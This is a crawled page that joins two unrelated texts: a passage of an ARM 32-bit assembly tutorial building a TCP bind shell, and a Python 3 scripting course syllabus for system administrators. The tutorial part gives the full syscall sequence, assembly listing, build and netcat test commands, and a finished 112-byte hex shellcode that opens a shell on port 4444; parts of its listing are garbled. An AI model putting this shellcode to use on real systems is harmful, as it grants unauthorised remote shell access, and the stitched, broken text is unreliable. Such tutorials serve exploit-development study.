four strb instructions after strb r2, [r1, #1], you can also use one single str r2, [r1, #4] to do a full 0.0.0.0 write. The move instruction puts the length of the sockaddr_in structure length (2 bytes for AF_INET, 2 bytes for PORT, 4 bytes for ipaddress, 8 bytes padding = 16 bytes) into r2. Then, we set r7 to 282 by simply adding 1 to it, because r7 already contains 281 from the last syscall. // add r7, #1 // r7 = 281+1 = 282 (bind syscall number) svc #1 nop 3 – Listen for Incoming Connections Here we put the previously saved host_sockid into r0. R1 is set to 2, and r7 is just increased by 2 since it still contains the 282 from the last syscall. mov r0, r4 // r0 = saved host_sockid mov r1, #2 add r7, #2 // r7 = 284 (listen syscall number) svc #1 4 – Accept Incoming Connection Here again, we put the saved host_sockid into r0. Since we want to avoid null bytes, we use don’t directly move #0 into r1 and r2, but instead, set them to 0 by subtracting them from each other. R7 is just increased by 1. The result of this invocation will be our client_sockid, which we will save in r4, because we will no longer need the host_sockid that was kept there (we will skip the close function call from our C code). mov r0, r4 // r0 = saved host_sockid sub r1, r1, r1 // clear r1, r1 = 0 sub r2, r2, r2 // clear r2, r2 = 0 add r7, #1 // r7 = 285 (accept syscall number) svc #1 mov r4, r0 // save result (client_sockid) in r4 5 – STDIN, STDOUT, STDERR For the dup2 functions, we need the syscall number 63. The saved client_sockid needs to be moved into r0 once again, and sub instruction sets r1 to 0. For the remaining two dup2 calls, we only need to change r1 and reset r0 to the client_sockid after each system call. /* dup2(client_sockid, 0) */ mov r7, #63 // r7 = 63 (dup2 syscall number) mov r0, r4 // r4 is the saved client_sockid sub r1, r1, r1 // r1 = 0 (stdin) svc #1 /* dup2(client_sockid, 1) */ mov r0, r4 // r4 is the saved client_sockid add r1, #1 // r1 = 1 (stdout) svc #1 /* dup2(client_sockid, 2) */ mov r0, r4 // r4 is the saved client_sockid add r1, #1 // r1 = 1+1 (stderr) svc #1 6 – Spawn the Shell //” string at the end of our assembly code. struct_addr: .ascii "\x02\xff" // AF_INET 0xff will be NULLed .ascii "\x11\x5c" // port number 4444 .byte 1,1,1,1 // IP Address shellcode: , r2 // set r2 to null mov r7, #200 // r7 = 281 (socket) add r7, #81 // r7 value needs to be split svc #1 // r0 = host_sockid value mov r4, r0 // save host_sockid in r4 // // struct address length add r7, #1 // r7 = 282 (bind) svc #1 nop // listen(sockfd, 0) mov r0, r4 // set r0 to saved host_sockid mov r1, #2 add r7, #2 // r7 = 284 (listen syscall number) svc #1 // accept(sockfd, NULL, NULL); mov r0, r4 // set r0 to saved host_sockid sub r1, r1, r1 // set r1 to null sub r2, r2, r2 // set r2 to null add r7, #1 // r7 = 284+1 = 285 (accept syscall) svc #1 // r0 = client_sockid value mov r4, r0 // save new client_sockid value to r4 // dup2(sockfd, 0) mov r7, #63 // r7 = 63 (dup2 syscall number) mov r0, r4 // r4 is the saved client_sockid sub r1, r1, r1 // r1 = 0 (stdin) svc #1 // dup2(sockfd, 1) mov r0, r4 // r4 is the saved client_sockid add r1, #1 // r1 = 1 (stdout) svc #1 // dup2(sockfd, 2) mov r0, r4 // r4 is the saved client_sockid add r1, #1 // r1 = 2 (stderr) svc #1 // struct_addr: .ascii "\x02\xff" // AF_INET 0xff will be NULLed .ascii "\x11\x5c" // port number 4444 .byte 1,1,1,1 // IP Address shellcode: .ascii "/bin/shX" Save your assembly code into a file called bind:~/bindshell $ as bind_shell.s -o bind_shell.o && ld -N bind_shell.o -o bind_shell pi@raspberrypi:~/bindshell $ ./bind_shell Then, connect to your specified port: pi@raspberrypi:~ $ netcat -vv 0.0.0.0 4444 Connection to 0.0.0.0 4444 port [tcp/*] succeeded! uname -a Linux raspberrypi 4.4.34+ #3 Thu Dec 1 14:44:23 IST 2016 armv6l GNU/Linux It works! Now let’s translate it into a hex string with the following command: pi@raspberrypi:~/bindshell $ objcopy -O binary bind_shell bind_shell.bin pi@raspberrypi:~/bindshell $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bind12\xa1\x4a\x70\x0a\x71\x4a\x71\x8a\x71\xca\x71\x10\x22\x01\x37\x01\xdf\xc0\x46\x20\x1c\x02\x21\x02\x37\x01\xdf\x20\x1c\x49\x1a\x92\x1a\x01\x37\x01\xdf\x04\x1c\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x05\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\xc0\x46\x02\xff\x11\x5c\x01\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58 Voilà, le bind shellcode! This shellcode is 112 bytes long. Since this is a beginner tutorial and to keep it simple, the shellcode is not as short as it could be. After making the initial shellcode work, you can try to find ways to reduce the amount of instructions, hence making the shellcode shorter.
https://movaxbx.ru/2018/01/12/tcp-bind-shell-in-assembly-arm-32-bit/
CC-MAIN-2018-17
refinedweb
2,256
60.65
November 2004 Archives Fantastic news. Belfast is to host the 2005 World Toilet Summit, very near to where I work. According to Cleanpoint.com:- Hosted by The British Toilet Association, the Summit is being supported by the Northern Ireland Tourist Board, Belfast City Council, the International Fund for Ireland and Belfast Visitor Convention Bureau, along with The World Toilet Organisation (WTO). BTA Director Richard Chisnell told CHT: "We are busy planning a memorable four days for delegates" Sounds to me like they plan to go on the p**s and talk crap... Just found out about the various extensions to RSS 2 that allow information about comments to be included in the RSS feeds. I have revised my feed to include the full article along with links to the comments in it, numbers of comments etc. For more information on supporting comments in Moveable Type see this excellent HOWTO by Oleg Tkachenko. The only caveat I would add is that you must remember to add the following namespace declarations to your RSS feed file (index.xml):- xmlns:wfw="" xmlns:slash="" The Register have published the results of an important benchmark test - what is the best free rucksack. No matter how boring the presentation, everyones eyes always light up when the contents of the marketing cupboard are raided. A simple but particular favourite of mine is my rather solid BEA pen - much better than the pack of crayons or USB power laptop light. I know many a BEA consultant who are fond of their watches. Sometimes I wonder what normal people place under their mice and where they get mouse mats from. Their are plenty of alternative uses for CD's (any probably a few websites devoted to the topic) but I don't know any other uses for mouse mats - so mine live in the back of dark drawers, hibernating. My Interwoven pen-knife got me in a bit of bother when casually left it in my laptop bag and then tried to get on a plane. Clothing is always a favourite. Because I am of a somewhat unusal physique I have never been given a freebie that I can actually fit in to. To take revenge I get great pleasure in giving reps clothing belong to that of their competitors and make them wear it. While not strictly manufacturers free crap, the best freebies of all have to be the wash bags and pyjamas you get in First Class on BA flights. They make great Christmas presents. Interesting article in Wired about "Numbers Stations" that broadcast on Shortwave. These are high-powered transmitters across the planet are are broadcasting strings of numbers, letters, backwards music, or even the noise of a fruit machine. Spectrographic analysis of the signals has revealed that modulated data bursts are sometimes contained within the transmissions. A subculture of obsessive listeners has built up around the stations, despite the fact that they have little hope of ever decoding the signals. Undoubtably some are used by intelligence agencies around the world for transmitting one way signals to agents, but another use is probably to reserve the frequency for emergancy use. By broadcasting noise on a particular wavelength it prevents others from using that signal. The tactics involved in the use of the EM spectrum can sometimes be quite fascinating. Recently there was quite a bit of fuss about the EU's Galileo system broadcasting it's unencrypted positioning signals too close to the frequency used by the US for its encrypted GPS signals meaning that the US would not be able to jam the EU signal in times of war). During the recent US led attack on Falluja in Iraq, mobile and satallite communications were jammed in the area. All this just goes to show how much electronic warfare goes on and how little we usually hear about it. I. Ten by Ten is a new interesting project to capture the words and images that are making the news every hour of every day. The top 100 word and images are placed in a 10 x 10 grid for you to browse. The site has been produced in a developer friendly fashion so the possibility of site plugins is a possibility I may investigate. Worth five minutes of your time at any rate, plus it is an interesting experiment in information architecture. Been using Visual Studio 2003 lately, not a bad editor (no where near as good as intellij for Java for pretty good). Today, all of a sudden the autocomplete feature - called Intellisense (TM - M$) stopped working. Now normally, this is because of an error earlier in the code, not yet displayed to you (dumb). However this time my project was building fine, just no auto-complete. After much scratching of heads, the following seems to work:- - Shut down Visual Studio .NET - Open the project in explorere - Delete the binand objdirectories from within the project that is causing problems (or delete all of them if in doubt) - Start up Visual Studio Alternatively, you could install Resharper, which is also from Jetbrains and seems to put most of the stuff that was in IntelliJ into Visual Studio, and so far works a treat. Infact I think that Ctrl-Shift-N could well be the new Ctrl-Shift-N As I may have mentioned to anyone that will listen to me - I am currently getting up at a daft time of the morning to beat the traffic into work. On my journeys I have noticed a completely new invention that I have never noticed before but one that is such a good idea. On certain high speed bends on the un-lit road, there are now LED Cats Eyes lighting the way. I first noticed them when I was coming out of a junction and looked to my left to see the cats eyes were lit even though my headlights were not on them. They had a slight stobe to them bit were perfectly clear lighting the road ahead. What a great idea, just an incremental improvement on Percy Shaw's original idea, but what a good one. Found a bit more about them at a company called Relfecto, along with some interesting toys... So, how about a desktop application that allows you to zoom in to any part of the world, move around and view in 3D? How about the appliation coming from NASA, which means you have a NASA directory in your Program Files, and a cool NASA icon on your desktop? How about the application in question being Open Source and written in C#? If like me you think this is really cool, then download World Wind from NASA. The project is in SourceForge if you also would like to help. The software is really cool. Works a treat! Unfortuneately the server seems quite busy and you get lots of errors saying so, however when it is working it is soo worth it. The picture here is of my journey to work, nice... I can virtually fly to work in less than a second... What.
http://www.woodwardweb.com/2004/11/
CC-MAIN-2015-48
refinedweb
1,181
67.99
Destructuring Assignment is an amazing feature introduced with EcmaScript 2016, which is now available in both browsers and Node.js. If you’re writing CommonJs or ES6 modules, you’re probably already using it! Let’s pretend we have a file called math.js, where we have a bunch of functions to be exported: export const add5 = (num) => num + 5; export const double = (num) => num * 2; export const half = (num) => num / 2; If we create a new file, let’s say index.js, we can import the functions above in block: import math from "./math.js"; const example1 = math.double(10); // => 20 const example2 = math.add5(10); // => 15 const example3 = math.half(30); // => 15 But now imagine if our math.js file had hundreds of functions. Why do we import them all, if we only need (for example) math.double? Here comes the concept of object destructuring: import { double } from "./math.js"; const example1 = double(10); // => 20 Our maths.js file exports an object containing every exported function. So, if we don’t want to import a lot of useless functions from that file, we can just destructure the exported object and get back only the functions we really need! Simple Object Destructuring const user = { name: { first: "John", middle: "Mitch", last: "Doe" }, contacts: { email: "john.doe@foo.dev", phone: "333 000000" } } const { name, contacts } = user; console.log(name); // => { first: "John", middle: "Mitch", last: "Doe" } console.log(contacts); // => { email: "john.doe@foo.dev", phone: "333 000000" } In the code above, we defined an object (user) with some nested properties. We got access to name and contacts by destructuring the user object, so after the destructuring assignment we’ll always be able to call name and contacts properties without typing user.name and user.contacts. Pretty handy, isn’t it? Nested Object Destructuring Let’s try something a bit more complex, nested object destructuring. const developer = { name: "Mitch", age: 24, languages: { favorite: "Haskell", mostUsed: "JavaScript" } } const { name, age, languages: { mostUsed, favorite } } = developer; const bio = `${name} is a ${age} years old developer.\n` + `He codes in ${mostUsed} but prefers ${favorite}`; // => "Mitch is a 24 years old developer. // He codes in JavaScript but prefers Haskell" Let’s analyze the code above! We defined a new object called developer, where we have a nested property, languages. In our destructuring assignment, we got access to name and age. Nothing new! But when we wanted to access both favorite and mostUsed properties, from the languages key, we had to destructure languages itself. That way, we’ll have two new constant values (favorite and mostUsed), and we don’t need to access the developer object everytime we need them! Tip: you can add a new property just by using the ES6 default parameter feature! const developer = { name: "Mitch", age: 24, languages: { favorite: "Haskell", mostUsed: "JavaScript" } } const { name, age, languages: { mostUsed, favorite, dreaded = "PHP" } } = developer; const bio = `${name} is a ${age} years old developer.\n` + `He codes in ${mostUsed} but prefers ${favorite}\n` + `He fearse ${dreaded}`; // => "Mitch is a 24 years old developer. // He codes in JavaScript but prefers Haskell. // He fears PHP." Array Destructuring Arrays can be destructured too! Let’s see the easiest case: const phrase = ["Hello", "John", "!"]; const [greet, name] = phrase; console.log(greet); // => "Hello" console.log(name); // => "John" Way better than accessing those values by using indexes ( phrase[0], phrase[1])! But what if (for some reason) we want to get just the exclamation point ( phrase[2])? const phrase = ["Hello", "John", "!"]; const [,, exclamation] = phrase; console.log(exclamation); // => "!" Here we are! I don’t find this to be a clean way to get just a certain element from an array… but it may be useful, what do you think? Default Values As we’ve seen during object destructuring, we can assign default values to our array while we’re destructuring it: const RGB = [55, 155]; const [R, G, B = 255] = RGB; console.log(R); // => 55 console.log(G); // => 155 console.log(B); // => 255 That way, we’ll be sure that we have a fallback value in case B is undefined! Head and Tail If you’re coming from a functional language such as Haskell, you may be familiar with the concept of head and tail. Let’s see an example: let list = [1, 2, 3, 4, 5] let h = head list let t = tail list print h -- 1 print t -- [2,3,4,5] So as you can see in the example above, we’re getting the first element of a list (array in Haskell) using the head function, and the rest of the list using the tail function. This is super useful in recursive functions, but we’re not gonna talk about that in this article; we just want to achieve the same result using array destructuring in JavaScript: const list = [1, 2, 3, 4, 5]; const [head, ...tail] = list; console.log(head); // => 1 console.log(tail); // => [2, 3, 4, 5] So easy! We just used the formidable spread operator and array destructuring together! Nested Array Destructuring Just like objects, nested arrays can be destructured too! Let’s say we have a grid, which is represented the following way: +-—--+----+----+ | 10 | 10 | 10 | <- FIRST ROW +-—--+----+----+ | 60 | 50 | 60 | <- SECOND ROW +-—--+----+----+ | 90 | 90 | 90 | <- THIRD ROW +-—--+----+----+ We want to get the first row, the center value (50) and the third row: const grid = [[10, 10, 10], [60, 50, 60], [90, 90, 90]]; const [first, [, center, ,], third] = grid; console.log(first); // => [10, 10, 10] console.log(center); // => 50 console.log(third); // => [90, 90, 90] A lot easier than accessing those values by using grid[0], grid[1][1] and grid[2]! Cloning An Array Array destructuring also makes immutable array cloning a lot easier: const myArray = [1, 2, 3, 4, 5]; const clone = myArray; myArray[1] = "two"; console.log(myArray); // => [1, "two", 3, 4, 5] console.log(clone); // => [1, "two", 3, 4, 5] As you can see, when we clone an array by reference, if we mutate the original one, the change will also affect the clone… we can simply avoid this by cloning by value: const myArray = [1, 2, 3, 4, 5]; const clone = [...myArray]; myArray[1] = "two"; console.log(myArray); // => [1, "two", 3, 4, 5] console.log(clone); // => [1, 2, 3, 4, 5] Well done, array destructuring!
https://www.hackdoor.io/articles/myNBWpxn/es6-destructuring-assignment
CC-MAIN-2020-10
refinedweb
1,041
65.83
1596879348 This tutorial is highly referenced from Emmanuel Henri’s LinkedIn Learning tutorial released 11/5/2019. It took me a long time to find a resource to help me on my journey of building a MERN stack app and this checks a lot of boxes: Video code-alongs can be great. Until you don’t have whatever piece of technology they have and can’t get for whatever reason. Or you have to download exercise files that you can’t send to your personal computer because of work security blocks. Or you just need that one specific part and you don’t want to sift through all the clips to get to it. You get the point. So this adapted play by play of Henri’s tutorial (with permission*) is for my future self and, since you’re here, for you too. Welcome. Experience level: Beginner level JavaScript, comfortable in the terminal, and curiosity for what a MERN app is. Technology you’ll need before you start: Frameworks/Libraries/Dependencies we will be working with along the way (nothing you need to do now): Alright! Let’s start the project! What do you want to build? For me, I want to make an app that tracks my anti-racism work. I’m going to start out with one thing to track for now, which is the donations that I make. I want to know the organization they’re to, how much I give to them, the date I made the donation and any optional comments I feel may be relevant. Feel free to make something similar or get creative Head on over to your favorite terminal and make a new folder: ~$ mkdir antiracism_mern And head into that folder: ~$ cd antiracism_mern Now initialize your project which will create a new package.json file: antiracism_mern$ npm init It’s going to ask you a series of questions. You can be a good citizen and answer all of these or you can be lazy like me and hit enter through all of them. You can always go back and edit them later through the package.json file. 🙃 Install express: antiracism_mern$ npm i express Install MongoDB and Mongoose: antiracism_mern$ npm i mongodb mongoose Save Babel dev dependencies: antiracism_mern$ npm i --save-dev babel-cli babel-preset-env babel-preset-stage-0 Install body-parser json and nodemon: antiracism_mern$ npm i body-parser nodemon Now open in VSCode: antiracism_mern$ code . Head on over to your package.json file (⌘P) and change the “scripts” object. This will make sure our server restarts and make sure that babel transpiler executes: "scripts": { "start": "nodemon ./index.js --exec babel-node -e js" }, Your package.json file should look like this: package.json with scripts object update Head back to your terminal and create a new file: antiracism_mern$ touch index.js In VSCode navigate to that new index.js file to set up the initial server, insert: import express from 'express'; const app = express(); const PORT = 4000; app.get('/', (req, res) => res.send(`Node and express server running on port ${PORT}`) ) app.listen(PORT, () => console.log(`Your server is running on port ${PORT}`)) Head back to your terminal and create a new file: antiracism_mern$ touch .babelrc Babel is transpiling and so we need to help it do it’s thing. Go into that .babelrc in your VSCode and insert: { "presets": ["env", "stage-0"] } Friendly reminder to save that file. :) #expressjs #tutorial #nodejs #mongodb #mern #restful apis1359240 Express.js Tutorial: Building RESTful APIs with Node Express. nodejs tutorial with api building with get and post methods. #express #apis #node #restful apis #express.js
https://morioh.com/p/49fbd6bf3659
CC-MAIN-2021-49
refinedweb
603
64.71
Python 3 Scripting for System Administrators Keith Thompson DevOps Training Architect II in Content Course Details In this course, you will develop the skills that you need to write effective and powerful scripts and tools using Python 3. We will go through the necessary features of the Python language to be able to leverage its additional benefits in writing scripts and creating command line tools (data types, loops, conditionals, functions, error handling, and more). Beyond the language itself, you will go through the full development process including project set up, planning, and automated testing to build two different command line tools. Syllabus Course Introduction Getting Started Course Introduction 00:02:43 Lesson Description: Get a brief overview of the course's content, flow, and prerequisites. About the Course Author 00:00:57 Lesson Description: A little about me, Keith Thompson. Course Features and Tools 00:05:02 Lesson Description: Learn about the various course features that are utilized by Python 3 for System Administrators. Environment Setup Setting up a Cloud Server Development Environment 00:12:08 Lesson Description: Go through the process of setting up the necessary tools and packages for following along with this course by setting up a Cloud Server for development. Required Software Packages, Tools, and Files git wget which words (need file at /usr/share/dict/words) lsof text editor of your choice python 3.6.5 Installing Packages The following commands are used on the cloud server to install the packages and files that we need. $ sudo su - $ yum update $ yum groupinstall -y "development tools" $ yum install -y lsof wget vim-enhanced words which $ exit Configuring Git From our user account (instead of root), we'll configure git using our own information and these commands: $ git config --global user.name "Your Name" $ git config --global user.email "your_email@example.com" Customizing Bash We'll customize our bash prompt by downloading a bashrc file from our content repository and placing it our $HOME directory. This command will download the file, rename it, and place it in the proper directory: $ curl -o ~/.bashrc Customizing Vim Like we did with the bashrc, we'll customize Vim by downloading a vimrc file with this command: $ curl -o ~/.vimrc Installing Python 3 on CentOS 7 00:08:28 Lesson Description: Learn how to install Python 3 from source on a CentOS 7 machine. Download and Install Python 3 from Source Here are the commands that we’ll run to build and install Python 3: $ sudo su - [root] $ yum groupinstall -y "development tools" [root] $ [root ] $ cd /usr/src [root ] $ wget [root ] $ tar xf Python-3.6.4.tar.xz [root ] $ cd Python-3.6.4 [root ] $ ./configure --enable-optimizations [root ] $ make altinstall [root ] $ exit Important: make altinstall causes it to not replace the built in python executable. Ensure that secure_path in /etc/sudoers file includes /usr/local/bin. The line should look something like this: Defaults secure_path = /sbin:/bin:/usr/sbin:/usr/bin:/usr/local (Optional) Installing Python 3 on Debian/Ubuntu 00:08:27 Lesson Description: Learn how to install Python 3 from source on a Debian or Ubuntu machine. This video uses an Ubuntu 16.04 Linux Academy Cloud Server. Download and Install Python 3 from Source Here are the commands that we’ll run to build and install Python 3: $ sudo su - [root] $ apt update -y [root] $ apt install -y wget build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev libncurses5-dev libncursesw5-dev xz-utils tk-dev [root] $ cd /usr/src [root] $ wget [root] $ tar xf Python-3.6.4.tar.xz [root] $ cd Python-3.6.4 [root] $ ./configure --enable-optimizations [root] $ make altinstall [root] $ exit Note: make altinstall causes it to not replace the built in python executable. Ensure that secure_path in /etc/sudoers file includes /usr/local/bin. The line should look something like this: Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap Introducing Python History & Benefits of Python 00:07:10 Lesson Description: Learn briefly about the history and benefits of Python. History & Overview of Python First appearance: 1991 Creator: Guido van Rossum Key Points About Python: Object-Oriented Scripting Language. Dynamic & strong typing system. Dynamic types are checked at runtime Strong types don’t change implicitly, can’t add 1 and "something". Supports functional concepts like map, reduce, filter, and list comprehension. Whitespace delimited (no { or } around code blocks) Pseudo-code like syntax Extremely popular language used across many different disciplines (academia, data science, scripting, web development, etc.). Large open source community and public package index (Pypi). Runs on all major operating systems (historically more of a pain to run on Windows than Unix systems). Pre-installed on most *NIX systems (usually Python 2). Supported by large companies such as Google & YouTube. Consistently high on the Tiobe Index (one of the most searched programming languages). 4th as of the time of recording this. Placed in the Stack Overflow Developer Survey’s top 10 for Most Popular Programming Languages, Most Loved Programming Languages, and placed number 1 as the “Most Wanted Language” (meaning it’s the language that developers want to use the most). What's the Deal with Python 3? 00:07:54 Lesson Description: Learn about why Python 3 was such a big deal when it was created and took years before being widely adopted. Links From This Video Python 2 vs. Python 3 Differences between Python 2 & 3 Just Enough Python Running Python Introducing the REPL for Rapid Experimentation 00:03:14 Lesson Description: Python is an interpreted language, and the code is evaluated line-by-line. Since each line can be evaluated by itself, the time between evaluating each line doesn’t matter, and this allows us to have a REPL. What is a REPL? REPL stands for: Read, Evaluate, Print, Loop Each line is read, evaluated, the return value is then printed to the screen, and then the process repeats. Python ships with a REPL, and you can access it by running python3.6 from your terminal. $ python3.6 Python 3.6.4 (default, Jan 5 2018, 20:24:27) [GCC 4.8.5 20150623 (Red Hat 4.8.5-16)] on linux Type "help", "copyright", "credits" or "license" for more information. >>> The >>> indicates that you can type on that line. Later on, you’ll also see a ... which means that you are currently in a scoped area and will need to enter a blank line (no spaces) before it evaluates the entire code block. The simplest use of this would be to do some math: >>> 1 + 1 2 >>> 2 is the return value of the expression, and it is then printed to the screen. If something doesn’t have a return value, then nothing will be printed to the screen and you’ll see the next prompt immediately. We’ll cover this later, but an example would be None: >>> None >>> Lastly, to exit the REPL, you can either type exit() (the parentheses are important), or you can hit Ctrl+d on your keyboard. Creating and Running Python Scripts 00:08:09 Lesson Description: Since this is a course about Python scripting, we will be writing the majority of our code in scripts instead of using the REPL. To create a Python script we can create a file ending with the file extension of .py. Creating Our First Python Script Let’s create our first script to write our obligatory “Hello, World!” program: $ vim hello.py From inside this file, we can enter the lines of Python that we need. For the “Hello, World!” example we only need: print("Hello, World!") There are a few different ways that we can run this file. The first is by passing it to the python3.6 CLI: $ python3.6 hello.py Hello, World! Setting a Shebang You’ll most likely want your scripts to be:Executable from anywhere (in our $PATH).Executable without explicitly using the python3.6 CLI. Thankfully, we can set the process to interpret our scripts by setting a shebang at the top of the file: hello.py #!/usr/bin/env python3.6 print("Hello, World") We’re not quite done; now we need to make the file executable using chmod: $ chmod u+x hello.py Run the script now by using ./hello.py and we’ll see the same result. If we’d rather not have a file extension on our script, we can now remove that since we’ve put a shebang in the file mv hello.py hello, and running ./hello will still result in the same thing. Adding Scripts to Our $PATH Now we need to make sure that we can put this in our $PATH. For this course, we’ll be using a bin directory in our $HOME folder to store our custom scripts, but scripts can go into any directory that is in your $PATH. Let’s create a bin directory and move our script: $ mkdir ~/bin $ mv hello ~/bin/ Here’s how we add this directory to the $PATH in our .bashrc (the .bashrc for this course already contains this): $ export PATH=$HOME/bin:$PATH Finally, run the hello script from our $PATH: $ hello Hello, World! Using Comments 00:03:49 Lesson Description: When writing scripts, we often want to leave ourselves notes or explanations. Python (along with most scripting languages) uses the # character to signify that the line should be ignored and not executed. Single Line Comment We can comment out a whole line: # This is a full like comment or we can comment at the end of a line: 2 + 2 # This will add the numbers What About Block Comments? Python does not have the concept of block commenting that you may have encountered in other languages. Many people mistake a triple-quoted string as being a comment, but it is not, it’s a multi-line string. That being said, multi-line strings can functionally work like comments, but they will still be allocated into memory. """ This is not a block comment, but it will still work when you really need for some lines of code to not execute. """ Common Data Types Strings 00:12:00 Lesson Description: Let’s learn about one of the core data types in Python: the str type. Python Documentation For This Video Strings (the str type) Strings Open a REPL to start exploring Python strings: $ python3.6 We’ve already worked with a string when we created our “Hello, World!” program. We create strings using either single quotes ('), double quotes ("), or triple single or double quotes for a multi-line string: >>> 'single quoted string' 'single quoted string' >>> "double quoted string" 'double quoted string' >>> ''' ... this is a triple ... quoted string ... ''' 'nthis is a triplenquoted stringn' Strings also work with some arithmetic operators. We can combine strings using the + operator and multiply a string by a number using the * operator: >>> "pass" + "word" 'password' >>> "Ha" * 4 'HaHaHaHa' A string is a sequence of characters grouped together. We need to cover the concept of an “Object” in object-oriented programming before moving on.An “object” encapsulates two things: StateBehaviorFor the built-in types, the state makes sense because it’s the entire contents of the object. The behavior aspect means that there are functions that we can call on the instances of the objects that we have. A function bound to an object is called a “method”. Here are some example methods that we can call on strings:find locates the first instance of a character (or string) in a string. This function returns the index of the character or string: >>> "double".find('s') -1 >>> "double".find('u') 2 >>> "double".find('bl') 3 lower converts all of the characters in a string to their lowercase versions (if they have one). This function returns a new string without changing the original, and this becomes important later: >>> "TeStInG".lower() # "testing" 'testing' >>> "another".lower() 'another' >>> "PassWord123".lower() 'password123' Lastly, if we need to use quotes or special characters in a string we can do that using the '’' character: >>> print("TabtDelimited") Tab Delimited >>> print("NewnLine") New Line >>> print("Slash\Character") SlashCharacter >>> print("'Single' in Double") 'Single' in Double >>> print('"Double" in Single') "Double" in Single >>> print(""Double" in Double") "Double" in Double Numbers (int and float) 00:07:20 Lesson Description: Let’s learn about some of the core data types in Python: the number types int and float. Python Documentation For This Video Numeric types (the int and float types) Numbers There are two main types of numbers that we’ll use in Python, int and float. For the most part, we won’t be calling methods on number types, and we will instead be using a variety of operators. >>> 2 + 2 # Addition 4 >>> 10 - 4 # Subtraction 6 >>> 3 * 9 # Multiplication 27 >>> 5 / 3 # Division 1.66666666666667 >>> 5 // 3 # Floor division, always returns a number without a remainder 1 >>> 8 % 3 # Modulo division, returns the remainder 2 >>> 2 ** 3 # Exponent 8 If either of the numbers in a mathematical operation in Python is a float, then the other will be converted before carrying out the operation, and the result will always be a float. Converting Strings and Numbers Conversion is not uncommon since we need to convert from one type to another when writing a script and Python provides built-in functions for doing that with the built-in types. For strings and numbers, we can use the str, int, and float functions to convert from one type to another (within reason). >>> str(1.1) '1.1' >>> int("10") 10 >>> int(5.99999) 5 >>> float("5.6") 5.6 >>> float(5) 5.0 You’ll run into issues trying to convert strings to other types if they aren’t present in the string >>> float("1.1 things") Traceback (most recent call last): File "", line 1, in ValueError: could not convert string to float: '1.1 things' Booleans and None 00:04:04 Lesson Description: Learn about how Python represents truthiness and nothingness. Python Documentation For This Video Booleans & None Booleans Booleans represent “truthiness” and Python has two boolean constants: True and False. Notice that these both start with capital letters. Later we will learn about comparisons operations, and those will often return either True or False. Representing Nothingness with None Most programming languages have a type that represents the lack of a value, and Python is no different. The constant used to represent nothingness in Python is None. None is a “falsy”, and we’ll often use it to represent when a variable has no value yet. An interesting thing to note about None is that if you type None into your REPL, there will be nothing printed to the screen. That’s because None actually evaluates into nothing. Working with Variables 00:05:54 Lesson Description: Almost any script that we write will need to have a way for us to hold onto information for use later on. That’s where variables come into play. Working with Variables We can assign a value to a variable by using a single = and we don’t need to (nor can we) specify the type of the variable. >>>>> my_str 'This is a simple string testing' That didn’t change the string; it reassigned the variable. The original string of "This is a simple string" was unchanged. An important thing to realize is that the contents of a variable can be changed and we don’t need to maintain the same type: >>> my_str = 1 >>> print(my_str) 1 Ideally, we wouldn’t change the contents of a variable called my_str to be an int, but it is something that python would let use do. One last thing to remember is that if we assign a variable with another variable, it will be assigned to the result of the variable and not whatever that variable points to later. >>> my_str = 1 >>> my_int = my_str >>>>> print(my_int) 1 >>> print(my_str) testing Lists 00:13:19 Lesson Description: In Python, there are a few different “sequence” types that we’re going to work with, the most common of which is the list type. Python Documentation For This Video Sequence Types Lists Lists A list is created in Python by using the square brackets ([, and ]) and separating the values by commas. Here’s an example list: >>> my_list = [1, 2, 3, 4, 5] There’s really not a limit to how long our list can be (there is, but it’s very unlikely that we’ll hit it while scripting). Reading from Lists To access an individual element of a list, you can use the index and Python uses a zero-based index system: >>> my_list[0] 1 >>> my_list[1] 2 If we try to access an index that is too high (or too low) then we’ll receive an error: >>> my_list[5] Traceback (most recent call last): File "", line 1, in IndexError: list index out of range To make sure that we’re not trying to get an index that is out of range, we can test the length using the len function (and then subtract 1): >>> len(my_list) 5 Additionally, we can access subsections of a list by “slicing” it. We provide the starting index and the ending index (the object at that index won’t be included). >>> my_list[0:2] [1, 2] >>> my_list[1:0] [2, 3, 4, 5] >>> my_list[:3] [1, 2, 3] >>> my_list[0::1] [1, 2, 3, 4, 5] >>> my_list[0::2] [1, 3, 5] Modifying a List Unlike strings which can’t be modified (you can’t change a character in a string), you can change a value in a list using the subscript equals operation: >>> my_list[0] = "a" >>> my_list ['a', 2, 3, 4, 5] If we want to add to a list we can use the .append method. This is an example of a method that modifies the object that is calling the method: >>> my_list.append(6) >>> my_list.append(7) >>> my_list ['a', 2, 3, 4, 5, 6, 7] Lists can be added together (concatenated): >>> my_list + [8, 9, 10] ['a', 2, 3, 4, 5, 6, 7, 8, 9, 10] >>> my_list += [8, 9, 10] >>> my_list ['a', 2, 3, 4, 5, 6, 7, 8, 9, 10] Items in lists can be set using slices also: >>> my_list[1:3] = ['b', 'c'] >>> my_list ['a', 'b', 'c', 4, 5, 6, 7, 8, 9, 10] # Replacing 2 sized slice with length 3 list inserts new element my_list[3:5] = ['d', 'e', 'f'] print(my_list) We can remove a section of a list by assigning an empty list to the slice: >>> my_list = ['a', 'b', 'c', 'd', 5, 6, 7] >>> my_list[4:] = [] >>> my_list ['a', 'b', 'c', 'd'] Removing items from a list based on value can be done using the .remove method: >>> my_list.remove('b') >>> my_list ['a', 'c', 'd'] Attempting to remove and item that isn’t in the list will result in an error: >>> my_list.remove('f') Traceback (most recent call last): File "", line 1, in ValueError: list.remove(x): x not in list Items can also be removed from the end of a list using the pop method: >>> my_list = ['a', 'c', 'd'] >>> my_list.pop() 'd' >>> my_list ['a', 'c'] We can also use the pop method to remove items at a specific index: >>> my_list.pop(0) 'a' >>> my_list ['c'] >>> my_list.pop(1) Traceback (most recent call last): File "", line 1, in IndexError: pop index out of range >>> [].pop() Traceback (most recent call last): File "", line 1, in IndexError: pop from empty list Tuples 00:05:38 Lesson Description: The most common immutable sequence type that we’re going to work with is going to be the tuple. Python Documentation For This Video Sequence Types Tuples Tuples Tuples are a fixed width, immutable 